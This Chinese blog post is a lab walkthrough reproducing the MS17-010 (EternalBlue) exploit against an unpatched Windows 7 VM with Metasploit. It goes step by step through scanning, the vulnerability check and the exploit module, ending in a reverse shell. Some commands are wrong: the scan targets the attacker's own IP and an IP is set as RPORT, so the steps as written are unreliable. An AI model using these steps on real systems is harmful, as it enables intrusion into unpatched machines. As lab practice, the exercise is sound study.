MSF ms17-010复现
渗透流程
环境准备
使用vm
靶机 windows7 2019.1 sp1 ==192.168.123.146==
攻击机 kali 2023 amd64 ==192.168.123.236==
win7 关闭所有防火墙,删除所有补丁,保证未处于公共网络


Nmap 扫描靶机## MSF ms17-010复现
正文内容
namp 192.168.123.236

发现445端口,smb服务开启,判断可能有永恒之蓝(ms17-010)漏洞
MSF攻击
进入MSF,并且查找ms17-010相关脚本
msfconsole


search ms17-010

探测是否容易受到ms17-010攻击
use 3
show options

填入靶机ip
set RPORT 192.168.123.236

开始探测
run

扫描结果显示容易受到攻击,判断存在漏洞
正式攻击
回到脚本选择界面


use 0
show options
这里同样只需要设置RHOST靶机ip
payload选择默认的反弹shell即可

run

连接建立,shell反弹成功

截图
screenshot



本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 pan0624的博客!